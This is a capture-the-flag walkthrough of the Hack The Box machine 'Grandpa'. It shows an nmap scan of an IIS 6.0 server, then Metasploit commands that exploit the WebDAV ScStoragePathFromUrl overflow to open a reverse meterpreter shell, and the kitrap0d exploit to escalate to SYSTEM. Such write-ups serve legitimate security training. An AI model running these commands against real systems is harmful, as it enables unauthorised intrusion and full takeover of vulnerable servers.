Grandpa is a fun Windows machine on the Hack The Box that is quite beginner friendly. This machine requires exploiting a known vulnerability to achieve initial user access and then utilizing privilege escalation to achieve system access. If you enjoy the machine go check out Granny as it is very similar.
Reconnaissance
nmap -A -T4 -p- 10.129.62.143Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-06 21:54 EDT
Nmap scan report for 10.129.62.143
Host is up (0.040s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-webdav-scan:
| Server Date: Fri, 07 Oct 2022 01:56:37 GMT
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (90%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 – SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows 2000 SP4 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 42.58 ms 10.10.14.1
2 42.67 ms 10.129.62.143
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.02 seconds
- -A: “Aggressive scan” – this switch adds OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (–traceroute).
- -T4: This switch is used for the timing of an nmap scan. There are five different speeds and -T4 is considered aggressive but generally recommended if you are using a stable broadband or ethernet internet connection.
- -p-: This switch will scan all 65,535 possible ports. This will typically be used in all of my initial scans to avoid missing anything on the network. Additionally, you can do a simple port scan and then further enumerate ports that you know are open if time is a factor in your scenario.
We used nmap to scan the network and discovered that port 80 is the only open port. It appears that port 80 is using IIS 6.0 which is very outdated (the most recent version is 10.0 v1809). Additionally we can see that TRACE is allowed which could potentially lead to Cross Site Tracing and there also is signs of possible malicious file injection.
Researching exploits for IIS 6.0 will quickly return us a great lead from Rapid7 – Microsoft IIS WebDav ScStoragePathFromUrl Overflow. Launch this exploit against the target using Metasploit to gain initial access.
Exploitation
msfconsole > use exploit/windows/iis/iis_webdav_scstoragepathfromurl > set lhost <x.x.x.x> > set rhosts <x.x.x.x> > run
Our meterpreter reverse TCP shell has spawned but unfortunately we are lacking privileges and will need more access to complete this box.
Privilege Escalation
ps
We listed processes and found process 1984 which is being run by NT AUTHORITY\NET WORK SERVICE. If we migrate to this process we may be able to elevate our privileges.
Nice! We migrated to process 1984 but still did not get SYSTEM access. The next step in privilege escalation will be to background the meterpreter session and use Metasploit local exploit suggester to find an exploit that can elevate our privileges to a higher level.
I’ve had luck with kitrap0d before so that is the privilege escalation exploit that I will try and use.
use exploit/windows/local/ms10_015_kitrap0d > set session 1 > set lhost 10.10.14.15 > run
Pwned! Good job on exploiting this machine. We now have full access and can obtain the hidden flags to complete the box challenges. If you enjoyed this machine, be sure to check out Granny as it is very similar.
